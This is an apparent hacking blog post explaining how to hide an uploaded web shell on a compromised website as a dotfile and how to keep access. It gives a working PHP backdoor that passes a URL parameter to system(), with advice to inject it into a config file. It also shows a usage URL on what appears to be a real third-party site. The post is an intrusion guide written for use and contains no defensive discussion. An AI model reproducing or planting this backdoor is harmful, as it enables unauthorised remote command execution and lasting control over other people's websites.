HIDING YOUR SHELL AND MAINTAINING ACCESS TO YOUR SHELL/HACKED WEBSITE
How can we hide a shell???
suppose 404.php is your shell when you want to hide it just make it as .404.php and upload it :)
shell will be hidden !!!
check out this here you cannot see 404.php because it is hidden as .404.php
but now check dis out :) give .404.php shell gets executed give ur created password and you are into shell !!
here you are into shell :)
now how to maintain access to your shell or your hacked site??
here is the php script
<?php
$url = $_GET['id'];
system($url);
?>
you can either inject in config file nt directly viewed by browser or make it as a file like maintain.php and upload it on shell now im uploading maintain.php into it
now you can execute system commands through your maintain.php backdoor as
http://www.ifuture.org.pk/ijest/scripts/maintain.php?id=ls
ls will list all the directories as you can see it listed all the directories in this way you can keep a backdoor to your shell :)
0 comments:
Post a Comment